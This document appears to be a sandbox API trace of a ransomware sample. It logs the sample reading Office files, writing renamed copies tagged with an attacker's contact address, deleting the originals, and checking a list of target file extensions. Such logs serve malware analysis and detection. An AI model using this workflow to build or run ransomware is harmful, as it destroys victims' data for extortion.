	[0160.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docs.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.785] GetLastError () returned 0x0
	[0160.785] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0161.182] WriteFile (in: hFile=0x37c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0161.183] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.183] WriteFile (in: hFile=0x37c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0161.183] SetEndOfFile (hFile=0x37c) returned 1
	[0161.183] CloseHandle (hObject=0x37c) returned 1
	[0161.183] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.183] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.187] CloseHandle (hObject=0x3c4) returned 1
	[0161.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.187] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\docs.ico")) returned 1
	[0161.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO") returned 62
	[0161.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO") returned 62
	[0161.188] lstrlenW (lpString=".doc") returned 4
	[0161.188] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.188] lstrlenW (lpString=".docx") returned 5
	[0161.188] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0161.188] lstrlenW (lpString=".pdf") returned 4
	[0161.188] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.188] lstrlenW (lpString=".xls") returned 4
	[0161.188] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.188] lstrlenW (lpString=".xlsx") returned 5
	[0161.188] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0161.188] lstrlenW (lpString=".ppt") returned 4
	[0161.188] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO") returned 62
	[0161.188] lstrlenW (lpString=".zip") returned 4
	[0161.188] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.188] lstrlenW (lpString=".rar") returned 4
	[0161.188] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.188] lstrlenW (lpString=".bz2") returned 4
	[0161.188] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.188] lstrlenW (lpString=".7z") returned 3
	[0161.188] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO") returned 62
	[0161.188] lstrlenW (lpString=".dbf") returned 4
	[0161.188] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO") returned 62
	[0161.188] lstrlenW (lpString=".1cd") returned 4
	[0161.188] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO") returned 62
	[0161.189] lstrlenW (lpString=".jpg") returned 4
	[0161.189] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO") returned 62
	[0161.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO") returned 62
	[0161.189] lstrlenW (lpString=".doc") returned 4
	[0161.189] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.189] lstrlenW (lpString=".docx") returned 5
	[0161.189] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0161.189] lstrlenW (lpString=".pdf") returned 4
	[0161.189] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.189] lstrlenW (lpString=".xls") returned 4
	[0161.189] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.189] lstrlenW (lpString=".xlsx") returned 5
	[0161.189] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0161.189] lstrlenW (lpString=".ppt") returned 4
	[0161.189] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO") returned 62
	[0161.189] lstrlenW (lpString=".zip") returned 4
	[0161.189] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.189] lstrlenW (lpString=".rar") returned 4
	[0161.189] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.189] lstrlenW (lpString=".bz2") returned 4
	[0161.189] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.189] lstrlenW (lpString=".7z") returned 3
	[0161.189] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO") returned 62
	[0161.189] lstrlenW (lpString=".dbf") returned 4
	[0161.189] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO") returned 62
	[0161.190] lstrlenW (lpString=".1cd") returned 4
	[0161.190] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DOCS.ICO") returned 62
	[0161.190] lstrlenW (lpString=".jpg") returned 4
	[0161.190] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.190] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.190] lstrlenW (lpString="IPMS.ICO") returned 8
	[0161.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipms.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0161.196] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=2998) returned 1
	[0161.196] CloseHandle (hObject=0x398) returned 1
	[0161.196] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipms.ico")) returned 0x20
	[0161.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipms.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipms.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0161.197] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.197] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipms.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.663] GetLastError () returned 0x0
	[0161.663] ReadFile (in: hFile=0x398, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0161.665] WriteFile (in: hFile=0x1d8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0161.665] ReadFile (in: hFile=0x398, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.665] WriteFile (in: hFile=0x1d8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0161.666] SetEndOfFile (hFile=0x1d8) returned 1
	[0161.666] CloseHandle (hObject=0x1d8) returned 1
	[0161.666] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.666] SetEndOfFile (hFile=0x398) returned 1
	[0161.668] CloseHandle (hObject=0x398) returned 1
	[0161.668] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.669] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipms.ico")) returned 1
	[0161.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO") returned 62
	[0161.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO") returned 62
	[0161.674] lstrlenW (lpString=".doc") returned 4
	[0161.674] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.674] lstrlenW (lpString=".docx") returned 5
	[0161.674] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0161.674] lstrlenW (lpString=".pdf") returned 4
	[0161.674] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.674] lstrlenW (lpString=".xls") returned 4
	[0161.674] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.674] lstrlenW (lpString=".xlsx") returned 5
	[0161.674] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0161.674] lstrlenW (lpString=".ppt") returned 4
	[0161.674] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO") returned 62
	[0161.674] lstrlenW (lpString=".zip") returned 4
	[0161.674] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.674] lstrlenW (lpString=".rar") returned 4
	[0161.674] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.674] lstrlenW (lpString=".bz2") returned 4
	[0161.674] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.674] lstrlenW (lpString=".7z") returned 3
	[0161.674] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO") returned 62
	[0161.674] lstrlenW (lpString=".dbf") returned 4
	[0161.674] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO") returned 62
	[0161.674] lstrlenW (lpString=".1cd") returned 4
	[0161.674] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO") returned 62
	[0161.674] lstrlenW (lpString=".jpg") returned 4
	[0161.674] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO") returned 62
	[0161.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO") returned 62
	[0161.675] lstrlenW (lpString=".doc") returned 4
	[0161.675] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.675] lstrlenW (lpString=".docx") returned 5
	[0161.675] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0161.675] lstrlenW (lpString=".pdf") returned 4
	[0161.675] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.675] lstrlenW (lpString=".xls") returned 4
	[0161.675] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.675] lstrlenW (lpString=".xlsx") returned 5
	[0161.675] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0161.675] lstrlenW (lpString=".ppt") returned 4
	[0161.675] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO") returned 62
	[0161.675] lstrlenW (lpString=".zip") returned 4
	[0161.675] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.675] lstrlenW (lpString=".rar") returned 4
	[0161.675] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.675] lstrlenW (lpString=".bz2") returned 4
	[0161.675] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.675] lstrlenW (lpString=".7z") returned 3
	[0161.675] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO") returned 62
	[0161.675] lstrlenW (lpString=".dbf") returned 4
	[0161.675] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO") returned 62
	[0161.675] lstrlenW (lpString=".1cd") returned 4
	[0161.675] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO") returned 62
	[0161.675] lstrlenW (lpString=".jpg") returned 4
	[0161.675] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.676] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.676] lstrlenW (lpString="POSTITS.ICO") returned 11
	[0161.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postits.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.676] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=2998) returned 1
	[0161.676] CloseHandle (hObject=0x3b8) returned 1
	[0161.676] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postits.ico")) returned 0x20
	[0161.676] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postits.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postits.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.677] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.677] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postits.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0161.677] GetLastError () returned 0x0
	[0161.677] ReadFile (in: hFile=0x3b8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0161.698] WriteFile (in: hFile=0x25c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0161.699] ReadFile (in: hFile=0x3b8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.699] WriteFile (in: hFile=0x25c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0161.699] SetEndOfFile (hFile=0x25c) returned 1
	[0161.699] CloseHandle (hObject=0x25c) returned 1
	[0161.699] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.699] SetEndOfFile (hFile=0x3b8) returned 1
	[0161.701] CloseHandle (hObject=0x3b8) returned 1
	[0161.702] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.702] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postits.ico")) returned 1
	[0161.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO") returned 65
	[0161.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO") returned 65
	[0161.702] lstrlenW (lpString=".doc") returned 4
	[0161.702] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.702] lstrlenW (lpString=".docx") returned 5
	[0161.703] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0161.703] lstrlenW (lpString=".pdf") returned 4
	[0161.703] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.703] lstrlenW (lpString=".xls") returned 4
	[0161.703] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.703] lstrlenW (lpString=".xlsx") returned 5
	[0161.703] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0161.703] lstrlenW (lpString=".ppt") returned 4
	[0161.703] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO") returned 65
	[0161.703] lstrlenW (lpString=".zip") returned 4
	[0161.703] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.703] lstrlenW (lpString=".rar") returned 4
	[0161.703] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.703] lstrlenW (lpString=".bz2") returned 4
	[0161.703] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.703] lstrlenW (lpString=".7z") returned 3
	[0161.703] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO") returned 65
	[0161.703] lstrlenW (lpString=".dbf") returned 4
	[0161.703] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO") returned 65
	[0161.703] lstrlenW (lpString=".1cd") returned 4
	[0161.703] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO") returned 65
	[0161.703] lstrlenW (lpString=".jpg") returned 4
	[0161.703] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO") returned 65
	[0161.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO") returned 65
	[0161.703] lstrlenW (lpString=".doc") returned 4
	[0161.703] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.704] lstrlenW (lpString=".docx") returned 5
	[0161.704] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0161.704] lstrlenW (lpString=".pdf") returned 4
	[0161.704] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.704] lstrlenW (lpString=".xls") returned 4
	[0161.704] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.704] lstrlenW (lpString=".xlsx") returned 5
	[0161.704] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0161.704] lstrlenW (lpString=".ppt") returned 4
	[0161.704] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO") returned 65
	[0161.704] lstrlenW (lpString=".zip") returned 4
	[0161.704] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.704] lstrlenW (lpString=".rar") returned 4
	[0161.704] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.704] lstrlenW (lpString=".bz2") returned 4
	[0161.704] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.704] lstrlenW (lpString=".7z") returned 3
	[0161.704] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO") returned 65
	[0161.704] lstrlenW (lpString=".dbf") returned 4
	[0161.704] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO") returned 65
	[0161.704] lstrlenW (lpString=".1cd") returned 4
	[0161.704] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO") returned 65
	[0161.704] lstrlenW (lpString=".jpg") returned 4
	[0161.704] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.705] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0161.705] lstrlenW (lpString="RCLRPT.CFG") returned 10
	[0161.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rclrpt.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0161.709] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=808) returned 1
	[0161.709] CloseHandle (hObject=0x37c) returned 1
	[0161.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rclrpt.cfg")) returned 0x20
	[0161.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rclrpt.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rclrpt.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.717] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.717] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rclrpt.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
